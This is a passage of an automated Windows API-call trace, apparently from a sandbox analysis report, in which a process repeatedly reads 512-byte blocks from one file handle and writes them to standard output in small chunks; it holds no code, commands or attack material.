0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] GetFileType (hFile=0x50) returned 0x1 [0195.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.018] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.018] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.019] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.019] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.019] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.020] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.020] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.020] GetFileType (hFile=0x50) returned 0x1 [0195.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.021] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.021] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] GetFileType (hFile=0x50) returned 0x1 [0195.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.021] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.022] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.022] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] GetFileType (hFile=0x50) returned 0x1 [0195.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.022] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.023] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.023] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.024] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.024] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.025] GetFileType (hFile=0x50) returned 0x1 [0195.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.025] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.047] GetFileType (hFile=0x50) returned 0x1 [0195.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.047] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.062] GetFileType (hFile=0x50) returned 0x1 [0195.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.062] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.063] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.063] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, 